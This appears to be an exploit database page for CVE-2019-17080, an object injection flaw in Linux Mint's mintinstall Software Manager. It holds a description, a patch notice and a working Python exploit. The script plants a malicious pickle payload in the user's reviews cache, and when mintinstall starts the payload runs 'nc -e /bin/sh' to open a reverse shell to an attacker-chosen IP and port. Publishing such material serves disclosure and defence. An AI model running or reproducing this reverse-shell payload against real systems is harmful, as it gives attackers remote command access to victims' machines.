header-logo
Suggest Exploit
vendor:
mintinstall
by:
Andhrimnirr
7.8
CVSS
HIGH
Object Injection
502
CWE
Product Name: mintinstall
Affected Version From: 7.9.9
Affected Version To: 7.9.9
Patch Exists: Yes
Related CWE: CVE-2019-17080
CPE: a:linux_mint:mintinstall
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux Mint
2019

mintinstall (aka Software Manager) object injection

This exploit is for mintinstall (aka Software Manager) object injection vulnerability. It allows an attacker to inject malicious code into the .cache/mintinstall/reviews.cache file, which is then executed when the mintinstall application is started. The malicious code is written to the file using the shellCode() function, which takes a payload as an argument. The payload is a Python string that contains a command to execute a reverse shell to the attacker's machine.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of mintinstall.
Source

Exploit-DB raw data:

# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
def shellCode(payload):
    with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
        wb.write(payload)
    print("[+] Start mintinstall")
if __name__=="__main__":
    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
    print("[!] exploit.py [IP] [PORT]")

Navigation

Suggest Exploit

Services By CQR